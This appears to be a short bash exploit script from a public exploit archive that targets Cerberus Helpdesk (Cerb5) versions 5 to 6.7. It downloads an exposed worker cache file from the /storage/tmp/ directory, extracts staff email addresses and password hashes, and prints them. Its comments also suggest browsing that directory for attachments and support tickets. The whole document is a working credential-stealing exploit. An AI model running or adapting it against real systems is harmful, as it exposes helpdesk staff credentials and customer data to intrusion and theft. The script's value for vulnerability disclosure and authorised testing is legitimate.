#!/bin/bash
#####################################################################################
# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
# Date: 04.02.2016 #
# Exploit Author: asdizzle_ #
# Vendor Homepage: http://www.cerberusweb.com/ #
# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
# Version: 5 - 6.7 #
# Tested on: Debian 8 / apache2 with cerb 5 #
#####################################################################################
# Prerequisites: #
# -At least one worker must be logged in #
# -/storage/tmp/ dir must be accessible #
# #
# If everything else fails try if there's directory listing in /storage/tmp #
# You might find attachments and even support tickets. #
#####################################################################################
url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
pre='devblocks' # If this doesn't work try 'zend'
echo "[*] Trying to fetch cache file"
cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
if [ -z "$cachechk" ];then
echo "[-] File not found."
exit
else
echo "[+] Found. Extracting..."
hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
if [ -z "$hashes" ];then
echo "[-] Hash extracting failed"
else
echo "[+] Extracting seems to have worked"
echo
echo "$hashes"
fi
fi
